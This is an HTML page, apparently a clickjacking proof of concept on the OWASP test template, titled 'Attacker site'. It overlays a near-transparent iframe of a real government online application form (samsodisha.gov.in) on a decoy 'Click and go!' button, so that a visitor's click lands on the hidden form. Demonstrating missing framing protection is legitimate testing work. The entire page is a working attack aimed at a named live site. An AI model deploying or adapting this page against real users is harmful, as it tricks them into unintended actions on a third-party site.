<html>
   <head>
      <style type="text/css">
         <!--
            *{
            	margin:0;
            	padding:0;
            }
            body {
            	background:#ffffff;
            }
            .button
            {
            	padding:5px;
            	background:#6699CC;
            	left:275px;
            	width:120px;
            	border: 1px solid #336699;
            }
            #content {
              padding-top:350px;
            	width: 500px;
            	height: 500px;
            	margin-top: 140px ;
            	margin-left: 820px;
            }
            #clickjacking
            {
            		position: absolute;
           left:192px;
       
top:20px;
            	filter: alpha(opacity=0);
            	opacity:0.2
            }
            //-->
      </style>
   </head>
   <body>
      <br><br>
      <div id="content">
   
         <h1>Attacker site</h1>
         <form action="http://www.owasp.com">
            <input type="submit" class="button" value="Click and go!">
         </form>
      </div>
      <iframe id="clickjacking" src="http://o.samsodisha.gov.in/ONLINE_CAF_Degree/CAFDEG.aspx" width="100%" height="100%" frameBorder="0" scrolling="no" frameborder="none"></iframe>
   </body>
</html>
